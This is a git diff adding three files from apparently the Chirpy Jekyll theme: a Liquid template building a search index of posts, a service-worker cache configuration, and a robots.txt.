a/assets/js/data/search.json b/assets/js/data/search.json new file mode 100644 index 0000000..2601ed0 --- /dev/null +++ b/assets/js/data/search.json @@ -0,0 +1,20 @@ +--- +layout: compress +swcache: true +--- + +[ + {% for post in site.posts %} + { + "title": {{ post.title | jsonify }}, + "url": {{ post.url | relative_url | jsonify }}, + "categories": {{ post.categories | join: ', ' | jsonify }}, + "tags": {{ post.tags | join: ', ' | jsonify }}, + "date": "{{ post.date }}", + {% include no-linenos.html content=post.content %} + {% assign _content = content | strip_html | strip_newlines %} + "snippet": {{ _content | truncate: 200 | jsonify }}, + "content": {{ _content | jsonify }} + }{% unless forloop.last %},{% endunless %} + {% endfor %} +] diff --git a/assets/js/data/swconf.js b/assets/js/data/swconf.js new file mode 100644 index 0000000..798888a --- /dev/null +++ b/assets/js/data/swconf.js @@ -0,0 +1,47 @@ +--- +layout: compress +permalink: '/:path/swconf.js' +# Note that this file will be fetched by the ServiceWorker, so it will not be cached. +--- + +const swconf = { + {% if site.pwa.cache.enabled %} + cacheName: 'chirpy-{{ "now" | date: "%s" }}', + + {%- comment -%} Resources added to the cache during PWA installation. {%- endcomment -%} + resources: [ + '{{ "/assets/css/:THEME.css" | replace: ':THEME', site.theme | relative_url }}', + '{{ "/" | relative_url }}', + {% for tab in site.tabs %} + '{{- tab.url | relative_url -}}', + {% endfor %} + + {% assign cache_list = site.static_files | where: 'swcache', true %} + {% for file in cache_list %} + '{{ file.path | relative_url }}'{%- unless forloop.last -%},{%- endunless -%} + {% endfor %} + ], + + interceptor: { + {%- comment -%} URLs containing the following paths will not be cached. {%- endcomment -%} + paths: [ + {% for path in site.pwa.cache.deny_paths %} + {% unless path == empty %} + '{{ path | relative_url }}'{%- unless forloop.last -%},{%- endunless -%} + {% endunless %} + {% endfor %} + ], + + {%- comment -%} URLs containing the following prefixes will not be cached. {%- endcomment -%} + urlPrefixes: [ + {% if site.analytics.goatcounter.id != nil and site.pageviews.provider == 'goatcounter' %} + 'https://{{ site.analytics.goatcounter.id }}.goatcounter.com/counter/' + {% endif %} + ] + }, + + purge: false + {% else %} + purge: true + {% endif %} +}; diff --git a/assets/robots.txt b/assets/robots.txt new file mode 100644 index 0000000..45c34e0 --- /dev/null +++ b/assets/robots.txt @@ -0,0 +1,10 @@ +--- +permalink: /robots.txt +# The robots rules +--- + +User-agent: * + +Disallow: /norobots/ + +Sitemap: {{ '/sitemap.xml' | absolute_url }}